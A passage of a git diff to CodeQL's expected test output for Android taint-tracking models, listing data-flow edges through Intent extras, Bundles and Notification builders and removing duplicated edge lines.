Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | Test.java:771:19:771:39 | getIntent_extras(...) : Bundle [] : String | -| Test.java:771:36:771:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | Test.java:771:19:771:39 | getIntent_extras(...) : Bundle [] : String | -| Test.java:778:38:778:40 | out : Intent [android.content.Intent.extras, ] : Object | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Object | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : Object | Test.java:778:21:778:41 | getIntent_extras(...) : Bundle [] : Object | | Test.java:778:38:778:40 | out : Intent [android.content.Intent.extras, ] : Object | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Object | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : Object | Test.java:778:21:778:41 | getIntent_extras(...) : Bundle [] : Object | | Test.java:790:65:790:72 | source(...) : String | Test.java:28:29:28:36 | k : String | Test.java:28:89:28:89 | b : Bundle [] : String | Test.java:790:45:790:73 | newBundleWithMapKey(...) : Bundle [] : String | | Test.java:792:19:792:39 | getIntent_extras(...) : Bundle [] : String | Test.java:24:19:24:30 | b : Bundle [] : String | Test.java:24:42:24:69 | next(...) : String | Test.java:792:9:792:40 | getMapKey(...) | | Test.java:792:36:792:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | Test.java:792:19:792:39 | getIntent_extras(...) : Bundle [] : String | -| Test.java:792:36:792:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | Test.java:792:19:792:39 | getIntent_extras(...) : Bundle [] : String | -| Test.java:799:38:799:40 | out : Intent [android.content.Intent.extras, ] : Object | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Object | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : Object | Test.java:799:21:799:41 | getIntent_extras(...) : Bundle [] : Object | | Test.java:799:38:799:40 | out : Intent [android.content.Intent.extras, ] : Object | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Object | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : Object | Test.java:799:21:799:41 | getIntent_extras(...) : Bundle [] : Object | | Test.java:813:19:813:39 | getIntent_extras(...) : Bundle [] : String | Test.java:24:19:24:30 | b : Bundle [] : String | Test.java:24:42:24:69 | next(...) : String | Test.java:813:9:813:40 | getMapKey(...) | | Test.java:813:36:813:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | Test.java:813:19:813:39 | getIntent_extras(...) : Bundle [] : String | -| Test.java:813:36:813:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | Test.java:813:19:813:39 | getIntent_extras(...) : Bundle [] : String | | Test.java:827:19:827:39 | getIntent_extras(...) : Bundle [] : String | Test.java:24:19:24:30 | b : Bundle [] : String | Test.java:24:42:24:69 | next(...) : String | Test.java:827:9:827:40 | getMapKey(...) | | Test.java:827:36:827:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | Test.java:827:19:827:39 | getIntent_extras(...) : Bundle [] : String | -| Test.java:827:36:827:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | Test.java:827:19:827:39 | getIntent_extras(...) : Bundle [] : String | -| Test.java:834:38:834:40 | out : Intent [android.content.Intent.extras, ] : ArrayList | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : ArrayList | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : ArrayList | Test.java:834:21:834:41 | getIntent_extras(...) : Bundle [] : ArrayList | | Test.java:834:38:834:40 | out : Intent [android.content.Intent.extras, ] : ArrayList | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : ArrayList | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : ArrayList | Test.java:834:21:834:41 | getIntent_extras(...) : Bundle [] : ArrayList | | Test.java:848:19:848:39 | getIntent_extras(...) : Bundle [] : String | Test.java:24:19:24:30 | b : Bundle [] : String | Test.java:24:42:24:69 | next(...) : String | Test.java:848:9:848:40 | getMapKey(...) | | Test.java:848:36:848:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | Test.java:848:19:848:39 | getIntent_extras(...) : Bundle [] : String | -| Test.java:848:36:848:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | Test.java:848:19:848:39 | getIntent_extras(...) : Bundle [] : String | -| Test.java:855:38:855:40 | out : Intent [android.content.Intent.extras, ] : ArrayList | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : ArrayList | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : ArrayList | Test.java:855:21:855:41 | getIntent_extras(...) : Bundle [] : ArrayList | | Test.java:855:38:855:40 | out : Intent [android.content.Intent.extras, ] : ArrayList | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : ArrayList | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : ArrayList | Test.java:855:21:855:41 | getIntent_extras(...) : Bundle [] : ArrayList | | Test.java:867:44:867:51 | source(...) : String | Test.java:28:29:28:36 | k : String | Test.java:28:89:28:89 | b : Bundle [] : String | Test.java:867:24:867:52 | newBundleWithMapKey(...) : Bundle [] : String | | Test.java:869:19:869:39 | getIntent_extras(...) : Bundle [] : String | Test.java:24:19:24:30 | b : Bundle [] : String | Test.java:24:42:24:69 | next(...) : String | Test.java:869:9:869:40 | getMapKey(...) | | Test.java:869:36:869:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | Test.java:869:19:869:39 | getIntent_extras(...) : Bundle [] : String | -| Test.java:869:36:869:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | Test.java:869:19:869:39 | getIntent_extras(...) : Bundle [] : String | -| Test.java:876:38:876:40 | out : Intent [android.content.Intent.extras, ] : Object | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Object | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : Object | Test.java:876:21:876:41 | getIntent_extras(...) : Bundle [] : Object | | Test.java:876:38:876:40 | out : Intent [android.content.Intent.extras, ] : Object | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Object | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : Object | Test.java:876:21:876:41 | getIntent_extras(...) : Bundle [] : Object | | Test.java:888:65:888:72 | source(...) : String | Test.java:28:29:28:36 | k : String | Test.java:28:89:28:89 | b : Bundle [] : String | Test.java:888:45:888:73 | newBundleWithMapKey(...) : Bundle [] : String | | Test.java:890:19:890:39 | getIntent_extras(...) : Bundle [] : String | Test.java:24:19:24:30 | b : Bundle [] : String | Test.java:24:42:24:69 | next(...) : String | Test.java:890:9:890:40 | getMapKey(...) | | Test.java:890:36:890:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | Test.java:890:19:890:39 | getIntent_extras(...) : Bundle [] : String | -| Test.java:890:36:890:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | Test.java:890:19:890:39 | getIntent_extras(...) : Bundle [] : String | -| Test.java:897:38:897:40 | out : Intent [android.content.Intent.extras, ] : Object | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Object | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : Object | Test.java:897:21:897:41 | getIntent_extras(...) : Bundle [] : Object | | Test.java:897:38:897:40 | out : Intent [android.content.Intent.extras, ] : Object | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Object | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : Object | Test.java:897:21:897:41 | getIntent_extras(...) : Bundle [] : Object | | Test.java:1064:52:1064:59 | source(...) : String | Test.java:28:29:28:36 | k : String | Test.java:28:89:28:89 | b : Bundle [] : String | Test.java:1064:32:1064:60 | newBundleWithMapKey(...) : Bundle [] : String | | Test.java:1066:20:1066:22 | out : Set [] : String | Test.java:22:19:22:32 | it : Set [] : String | Test.java:22:44:22:63 | next(...) : String | Test.java:1066:9:1066:23 | getElement(...) | diff --git a/java/ql/test/library-tests/frameworks/android/notification/test.expected b/java/ql/test/library-tests/frameworks/android/notification/test.expected index 65015ad867d..6d9b052cf1b 100644 --- a/java/ql/test/library-tests/frameworks/android/notification/test.expected +++ b/java/ql/test/library-tests/frameworks/android/notification/test.expected @@ -223,10 +223,7 @@ edges | Test.java:79:46:79:53 | source(...) : Object | Test.java:26:30:26:43 | element : Object | provenance | | | Test.java:79:46:79:53 | source(...) : Object | Test.java:79:25:79:54 | newWithMapKeyDefault(...) : Bundle [] : String | provenance | MaD:105 | | Test.java:80:4:80:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | Test.java:81:26:81:28 | out : Builder [android.content.Intent.extras, ] : String | provenance | | -| Test.java:80:4:80:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | Test.java:81:26:81:28 | out : Builder [android.content.Intent.extras, ] : String | provenance | | | Test.java:80:18:80:19 | in : Bundle [] : String | Test.java:80:4:80:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | provenance | MaD:4 | -| Test.java:80:18:80:19 | in : Bundle [] : String | Test.java:80:4:80:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | provenance | MaD:4 | -| Test.java:81:26:81:28 | out : Builder [android.content.Intent.extras, ] : String | Test.java:81:26:81:40 | getExtras(...) : Bundle [] : String | provenance | MaD:11 | | Test.java:81:26:81:28 | out : Builder [android.content.Intent.extras, ] : String | Test.java:81:26:81:40 | getExtras(...) : Bundle [] : String | provenance | MaD:11 | | Test.java:81:26:81:40 | getExtras(...) : Bundle [] : String | Test.java:81:9:81:41 | getMapKeyDefault(...) | provenance | MaD:194 | | Test.java:88:16:88:56 | (...)... : Bundle [] : String | Test.java:89:18:89:19 | in : Bundle [] : String | provenance | | @@ -234,10 +231,7 @@ edges | Test.java:88:48:88:55 | source(...) : Object | Test.java:32:32:32:45 | element : Object | provenance | | | Test.java:88:48:88:55 | source(...) : Object | Test.java:88:25:88:56 | newWithMapValueDefault(...) : Bundle [] : String | provenance | MaD:106 | | Test.java:89:4:89:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | Test.java:90:28:90:30 | out : Builder [android.content.Intent.extras, ] : String | provenance | | -| Test.java:89:4:89:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | Test.java:90:28:90:30 | out : Builder [android.content.Intent.extras, ] : String | provenance | | | Test.java:89:18:89:19 | in : Bundle [] : String | Test.java:89:4:89:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | provenance | MaD:5 | -| Test.java:89:18:89:19 | in : Bundle [] : String | Test.java:89:4:89:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | provenance | MaD:5 | -| Test.java:90:28:90:30 | out : Builder [android.content.Intent.extras, ] : String | Test.java:90:28:90:42 | getExtras(...) : Bundle [] : String | provenance | MaD:11 | | Test.java:90:28:90:30 | out : Builder [android.content.Intent.extras, ] : String | Test.java:90:28:90:42 | getExtras(...) : Bundle [] : String | provenance | MaD:11 | | Test.java:90:28:90:42 | getExtras(...) : Bundle [] : String | Test.java:22:28:22:43 | container : Bundle [] : String | provenance | | | Test.java:90:28:90:42 | getExtras(...) : Bundle [] : String | Test.java:90:9:90:43 | getMapValueDefault(...) | provenance | MaD:104 | @@ -254,15 +248,9 @@ edges | Test.java:112:48:112:55 | source(...) : Object | Test.java:32:32:32:45 | element : Object | provenance | | | Test.java:112:48:112:55 | source(...) : Object | Test.java:112:25:112:56 | newWithMapValueDefault(...) : Bundle [] : String | provenance | MaD:106 | | Test.java:113:4:113:10 | builder [post update] : Builder [android.content.Intent.extras, ] : String | Test.java:114:10:114:16 | builder : Builder [android.content.Intent.extras, ] : String | provenance | | -| Test.java:113:4:113:10 | builder [post update] : Builder [android.content.Intent.extras, ] : String | Test.java:114:10:114:16 | builder : Builder [android.content.Intent.extras, ] : String | provenance | | -| Test.java:113:22:113:23 | in : Bundle [] : String | Test.java:113:4:113:10 | builder [post update] : Builder [android.content.Intent.extras, ] : String | provenance | MaD:5 | | Test.java:113:22:113:23 | in : Bundle [] : String | Test.java:113:4:113:10 | builder [post update] : Builder [android.content.Intent.extras, ] : String | provenance | MaD:5 | | Test.java:114:10:114:16 | builder : Builder [android.content.Intent.extras, ] : String | Test.java:114:10:114:24 | build(...) : Action [android.content.Intent.extras, ] : String | provenance | MaD:8 | -| Test.java:114:10:114:16 | builder : Builder [android.content.Intent.extras, ] : String | Test.java:114:10:114:24 | build(...) : Action [android.content.Intent.extras, ] : String | provenance | MaD:8 | -| Test.java:114:10:114:16 | builder : Builder [android.content.Intent.extras, ] : String | Test.java:114:10:114:24 | build(...) : Action [android.content.Intent.extras, ] : String | provenance | MaD:8 | | Test.java:114:10:114:24 | build(...) : Action [android.content.Intent.extras, ] : String | Test.java:115:28:115:30 | out : Action [android.content.Intent.extras, ] : String | provenance | | -| Test.java:114:10:114:24 | build(...) : Action [android.content.Intent.extras, ] : String | Test.java:115:28:115:30 | out : Action [android.content.Intent.extras, ] : String | provenance | | -| Test.java:115:28:115:30 | out : Action [android.content.Intent.extras, ] : String | Test.java:115:28:115:42 | getExtras(...) : Bundle [] : String | provenance | MaD:17 | | Test.java:115:28:115:30 | out : Action [android.content.Intent.extras, ] : String | Test.java:115:28:115:42 | getExtras(...) : Bundle [] : String | provenance | MaD:17 | | Test.java:115:28:115:42 | getExtras(...) : Bundle [] : String | Test.java:22:28:22:43 | container : Bundle [] : String | provenance | | | Test.java:115:28:115:42 | getExtras(...) : Bundle [] : String | Test.java:115:9:115:43 | getMapValueDefault(...) | provenance | MaD:104 | @@ -319,10 +307,7 @@ edges | Test.java:206:46:206:53 | source(...) : Object | Test.java:26:30:26:43 | element : Object | provenance | | | Test.java:206:46:206:53 | source(...) : Object | Test.java:206:25:206:54 | newWithMapKeyDefault(...) : Bundle [] : String | provenance | MaD:105 | | Test.java:207:4:207:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | Test.java:208:26:208:28 | out : Builder [android.content.Intent.extras, ] : String | provenance | | -| Test.java:207:4:207:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | Test.java:208:26:208:28 | out : Builder [android.content.Intent.extras, ] : String | provenance | | | Test.java:207:18:207:19 | in : Bundle [] : String | Test.java:207:4:207:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | provenance | MaD:32 | -| Test.java:207:18:207:19 | in : Bundle [] : String | Test.java:207:4:207:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | provenance | MaD:32 | -| Test.java:208:26:208:28 | out : Builder [android.content.Intent.extras, ] : String | Test.java:208:26:208:40 | getExtras(...) : Bundle [] : String | provenance | MaD:39 | | Test.java:208:26:208:28 | out : Builder [android.content.Intent.extras, ] : String | Test.java:208:26:208:40 | getExtras(...) : Bundle [] : String | provenance | MaD:39 | | Test.java:208:26:208:40 | getExtras(...) : Bundle [] : String | Test.java:208:9:208:41 | getMapKeyDefault(...) | provenance | MaD:194 | | Test.java:214:16:214:56 | (...)... : Bundle [] : String | Test.java:215:18:215:19 | in : Bundle [] : String | provenance | | @@ -330,10 +315,7 @@ edges | Test.java:214:48:214:55 | source(...) : Object | Test.java:32:32:32:45 | element : Object | provenance | | | Test.java:214:48:214:55 | source(...) : Object | Test.java:214:25:214:56 | newWithMapValueDefault(...) : Bundle [] : String | provenance | MaD:106 | | Test.java:215:4:215:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | Test.java:216:28:216:30 | out : Builder [android.content.Intent.extras, ] : String | provenance | | -| Test.java:215:4:215:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | Test.java:216:28:216:30 | out : Builder [android.content.Intent.extras, ] : String | provenance | | | Test.java:215:18:215:19 | in : Bundle [] : String | Test.java:215:4:215:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | provenance | MaD:33 | -| Test.java:215:18:215:19 | in : Bundle [] : String | Test.java:215:4:215:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | provenance | MaD:33 | -| Test.java:216:28:216:30 | out : Builder [android.content.Intent.extras, ] : String | Test.java:216:28:216:42 | getExtras(...) : Bundle [] : String | provenance | MaD:39 | | Test.java:216:28:216:30 | out : Builder [android.content.Intent.extras, ] : String | Test.java:216:28:216:42 | getExtras(...) : Bundle [] : String | provenance | MaD:39 | | Test.java:216:28:216:42 | getExtras(...) : Bundle [] : String | Test.java:22:28:22:43 | container : Bundle [] : String | provenance | | | Test.java:216:28:216:42 | getExtras(...) : Bundle [] : String | Test.java:216:9:216:43 | getMapValueDefault(...) | provenance | MaD:104 | @@ -354,15 +336,9 @@ edges | Test.java:244:48:244:55 | source(...) : Object | Test.java:32:32:32:45 | element : Object | provenance | | | Test.java:244:48:244:55 | source(...) : Object | Test.java:244:25:244:56 | newWithMapValueDefault(...) : Bundle [] : String | provenance | MaD:106 | | Test.java:245:4:245:10 | builder [post update] : Builder [android.content.Intent.extras, ] : String | Test.java:246:10:246:16 | builder : Builder [android.content.Intent.extras, ] : String | provenance | | -| Test.java:245:4:245:10 | builder [post update] : Builder [android.content.Intent.extras, ] : String | Test.java:246:10:246:16 | builder : Builder [android.content.Intent.extras, ] : String | provenance | | -| Test.java:245:22:245:23 | in : Bundle [] : String | Test.java:245:4:245:10 | builder [post update] : Builder [android.content.Intent.extras, ] : String | provenance | MaD:33 | | Test.java:245:22:245:23 | in : Bundle [] : String | Test.java:245:4:245:10 | builder [post update] : Builder [android.content.Intent.extras, ] : String | provenance | MaD:33 | | Test.java:246:10:246:16 | builder : Builder [android.content.Intent.extras, ] : String | Test.java:246:10:246:24 | build(...) : Notification [extras, ] : String | provenance | MaD:36 | -| Test.java:246:10:246:16 | builder : Builder [android.content.Intent.extras, ] : String | Test.java:246:10:246:24 | build(...) : Notification [extras, ] : String | provenance | MaD:36 | -| Test.java:246:10:246:16 | builder : Builder [android.content.Intent.extras, ] : String | Test.java:246:10:246:24 | build(...) : Notification [extras, ] : String | provenance | MaD:36 | | Test.java:246:10:246:24 | build(...) : Notification [extras, ] : String | Test.java:247:28:247:30 | out : Notification [extras, ] : String | provenance | | -| Test.java:246:10:246:24 | build(...) : Notification [extras, ] : String | Test.java:247:28:247:30 | out : Notification [extras, ] : String | provenance | | -| Test.java:247:28:247:30 | out : Notification [extras, ] : String | Test.java:247:28:247:37 | out.extras : Bundle [] : String | provenance | | | Test.java:247:28:247:30 | out : Notification [extras, ] : String | Test.java:247:28:247:37 | out.extras : Bundle [] : String | provenance | | | Test.java:247:28:247:37 | out.extras : Bundle [] : String | Test.java:22:28:22:43 | container : Bundle [] : String | provenance | | | Test.java:247:28:247:37 | out.extras : Bundle [] : String | Test.java:247:9:247:38 | getMapValueDefault(...) | provenance | MaD:104 | @@ -722,10 +698,7 @@ edges | Test.java:851:46:851:53 | source(...) : Object | Test.java:26:30:26:43 | element : Object | provenance | | | Test.java:851:46:851:53 | source(...) : Object | Test.java:851:25:851:54 | newWithMapKeyDefault(...) : Bundle [] : String | provenance | MaD:105 | | Test.java:852:4:852:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | Test.java:853:26:853:28 | out : Builder [android.content.Intent.extras, ] : String | provenance | | -| Test.java:852:4:852:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | Test.java:853:26:853:28 | out : Builder [android.content.Intent.extras, ] : String | provenance | | | Test.java:852:18:852:19 | in : Bundle [] : String | Test.java:852:4:852:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | provenance | MaD:110 | -| Test.java:852:18:852:19 | in : Bundle [] : String | Test.java:852:4:852:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | provenance | MaD:110 | -| Test.java:853:26:853:28 | out : Builder [android.content.Intent.extras, ] : String | Test.java:853:26:853:40 | getExtras(...) : Bundle [] : String | provenance | MaD:117 | | Test.java:853:26:853:28 | out : Builder [android.content.Intent.extras, ] : String | Test.java:853:26:853:40 | getExtras(...) : Bundle [] : String | provenance | MaD:117 | | Test.java:853:26:853:40 | getExtras(...) : Bundle [] : String | Test.java:853:9:853:41 | getMapKeyDefault(...) | provenance | MaD:194 | | Test.java:858:16:858:56 | (...)... : Bundle [] : String | Test.java:859:18:859:19 | in : Bundle [] : String | provenance | | @@ -733,10 +706,7 @@ edges | Test.java:858:48:858:55 | source(...) : Object | Test.java:32:32:32:45 | element : Object | provenance | | | Test.java:858:48:858:55 | source(...) : Object | Test.java:858:25:858:56 | newWithMapValueDefault(...) : Bundle [] : String | provenance | MaD:106 | | Test.java:859:4:859:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | Test.java:860:28:860:30 | out : Builder [android.content.Intent.extras, ] : String | provenance | | -| Test.java:859:4:859:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | Test.java:860:28:860:30 | out : Builder [android.content.Intent.extras, ] : String | provenance | | | Test.java:859:18:859:19 | in : Bundle [] : String | Test.java:859:4:859:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | provenance | MaD:111 | -| Test.java:859:18:859:19 | in : Bundle [] : String | Test.java:859:4:859:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | provenance | MaD:111 | -| Test.java:860:28:860:30 | out : Builder [android.content.Intent.extras, ] : String | Test.java:860:28:860:42 | getExtras(...) : Bundle [] : String | provenance | MaD:117 | | Test.java:860:28:860:30 | out : Builder [android.content.Intent.extras, ] : String | Test.java:860:28:860:42 | getExtras(...) : Bundle [] : String | provenance | MaD:117 | | Test.java:860:28:860:42 | getExtras(...) : Bundle [] : String | Test.java:22:28:22:43 | container : Bundle [] : String | provenance | | | Test.java:860:28:860:42 | getExtras(...) : Bundle [] : String | Test.java:860:9:860:43 | getMapValueDefault(...) | provenance | MaD:104 | @@ -749,15 +719,9 @@ edges | Test.java:873:48:873:55 | source(...) : Object | Test.java:32:32:32:45 | element : Object | provenance | | | Test.java:873:48:873:55 | source(...) : Object | Test.java:873:25:873:56 | newWithMapValueDefault(...) : Bundle [] : String | provenance | MaD:106 | | Test.java:874:4:874:10 | builder [post update] : Builder [android.content.Intent.extras, ] : String | Test.java:875:10:875:16 | builder : Builder [android.content.Intent.extras, ] : String | provenance | | -| Test.java:874:4:874:10 | builder [post update] : Builder [android.content.Intent.extras, ] : String | Test.java:875:10:875:16 | builder : Builder [android.content.Intent.extras, ] : String | provenance | | -| Test.java:874:22:874:23 | in : Bundle [] : String | Test.java:874:4:874:10 | builder [post update] : Builder [android.content.Intent.extras, ] : String | provenance | MaD:111 | | Test.java:874:22:874:23 | in : Bundle [] : String | Test.java:874:4:874:10 | builder [post update] : Builder [android.content.Intent.extras, ] : String | provenance | MaD:111 | | Test.java:875:10:875:16 | builder : Builder [android.content.Intent.extras, ] : String | Test.java:875:10:875:24 | build(...) : Action [android.content.Intent.extras, ] : String | provenance | MaD:114 | -| Test.java:875:10:875:16 | builder : Builder [android.content.Intent.extras, ] : String | Test.java:875:10:875:24 | build(...) : Action [android.content.Intent.extras, ] : String | provenance | MaD:114 | -| Test.java:875:10:875:16 | builder : Builder [android.content.Intent.extras, ] : String | Test.java:875:10:875:24 | build(...) : Action [android.content.Intent.extras, ] : String | provenance | MaD:114 | | Test.java:875:10:875:24 | build(...) : Action [android.content.Intent.extras, ] : String | Test.java:876:28:876:30 | out : Action [android.content.Intent.extras, ] : String | provenance | | -| Test.java:875:10:875:24 | build(...) : Action [android.content.Intent.extras, ] : String | Test.java:876:28:876:30 | out : Action [android.content.Intent.extras, ] : String | provenance | | -| Test.java:876:28:876:30 | out : Action [android.content.Intent.extras, ] : String | Test.java:876:28:876:42 | getExtras(...) : Bundle [] : String | provenance | MaD:123 | | Test.java:876:28:876:30 | out : Action [android.content.Intent.extras, ] : String | Test.java:876:28:876:42 | getExtras(...) : Bundle [] : String | provenance | MaD:123 | | Test.java:876:28:876:42 | getExtras(...) : Bundle [] : String | Test.java:22:28:22:43 | container : Bundle [] : String | provenance | | | Test.java:876:28:876:42 | getExtras(...) : Bundle [] : String | Test.java:876:9:876:43 | getMapValueDefault(...) | provenance | MaD:104 | @@ -858,10 +822,7 @@ edges | Test.java:1042:46:1042:53 | source(...) : Object | Test.java:26:30:26:43 | element : Object | provenance | | | Test.java:1042:46:1042:53 | source(...) : Object | Test.java:1042:25:1042:54 | newWithMapKeyDefault(...) : Bundle [] : String | provenance | MaD:105 | | Test.java:1043:4:1043:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | Test.java:1044:26:1044:28 | out : Builder [android.content.Intent.extras, ] : String | provenance | | -| Test.java:1043:4:1043:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | Test.java:1044:26:1044:28 | out : Builder [android.content.Intent.extras, ] : String | provenance | | | Test.java:1043:18:1043:19 | in : Bundle [] : String | Test.java:1043:4:1043:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | provenance | MaD:134 | -| Test.java:1043:18:1043:19 | in : Bundle [] : String | Test.java:1043:4:1043:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | provenance | MaD:134 | -| Test.java:1044:26:1044:28 | out : Builder [android.content.Intent.extras, ] : String | Test.java:1044:26:1044:40 | getExtras(...) : Bundle [] : String | provenance | MaD:141 | | Test.java:1044:26:1044:28 | out : Builder [android.content.Intent.extras, ] : String | Test.java:1044:26:1044:40 | getExtras(...) : Bundle [] : String | provenance | MaD:141 | | Test.java:1044:26:1044:40 | getExtras(...) : Bundle [] : String | Test.java:1044:9:1044:41 | getMapKeyDefault(...) | provenance | MaD:194 | | Test.java:1049:16:1049:56 | (...)... : Bundle [] : String | Test.java:1050:18:1050:19 | in : Bundle [] : String | provenance | | @@ -869,10 +830,7 @@ edges | Test.java:1049:48:1049:55 | source(...) : Object | Test.java:32:32:32:45 | element : Object | provenance | | | Test.java:1049:48:1049:55 | source(...) : Object | Test.java:1049:25:1049:56 | newWithMapValueDefault(...) : Bundle [] : String | provenance | MaD:106 | | Test.java:1050:4:1050:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | Test.java:1051:28:1051:30 | out : Builder [android.content.Intent.extras, ] : String | provenance | | -| Test.java:1050:4:1050:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | Test.java:1051:28:1051:30 | out : Builder [android.content.Intent.extras, ] : String | provenance | | | Test.java:1050:18:1050:19 | in : Bundle [] : String | Test.java:1050:4:1050:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | provenance | MaD:135 | -| Test.java:1050:18:1050:19 | in : Bundle [] : String | Test.java:1050:4:1050:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | provenance | MaD:135 | -| Test.java:1051:28:1051:30 | out : Builder [android.content.Intent.extras, ] : String | Test.java:1051:28:1051:42 | getExtras(...) : Bundle [] : String | provenance | MaD:141 | | Test.java:1051:28:1051:30 | out : Builder [android.content.Intent.extras, ] : String | Test.java:1051:28:1051:42 | getExtras(...) : Bundle [] : String | provenance | MaD:141 | | Test.java:1051:28:1051:42 | getExtras(...) : Bundle [] : String | Test.java:22:28:22:43 | container : Bundle [] : String | provenance | | | Test.java:1051:28:1051:42 | getExtras(...) : Bundle [] : String | Test.java:1051:9:1051:43 | getMapValueDefault(...) | provenance | MaD:104 | @@ -889,15 +847,9 @@ edges | Test.java:1071:48:1071:55 | source(...) : Object | Test.java:32:32:32:45 | element : Object | provenance | | | Test.java:1071:48:1071:55 | source(...) : Object | Test.java:1071:25:1071:56 | newWithMapValueDefault(...) : Bundle [] : String | provenance | MaD:106 | | Test.java:1072:4:1072:10 | builder [post update] : Builder [android.content.Intent.extras, ] : String | Test.java:1073:10:1073:16 | builder : Builder [android.content.Intent.extras, ] : String | provenance | | -| Test.java:1072:4:1072:10 | builder [post update] : Builder [android.content.Intent.extras, ] : String | Test.java:1073:10:1073:16 | builder : Builder [android.content.Intent.extras, ] : String | provenance | | -| Test.java:1072:22:1072:23 | in : Bundle [] : String | Test.java:1072:4:1072:10 | builder [post update] : Builder [android.content.Intent.extras, ] : String | provenance | MaD:135 | | Test.java:1072:22:1072:23 | in : Bundle [] : String | Test.java:1072:4:1072:10 | builder [post update] : Builder [android.content.Intent.extras, ] : String | provenance | MaD:135 | | Test.java:1073:10:1073:16 | builder : Builder [android.content.Intent.extras, ] : String | Test.java:1073:10:1073:24 | build(...) : Notification [extras, ] : String | provenance | MaD:138 | -| 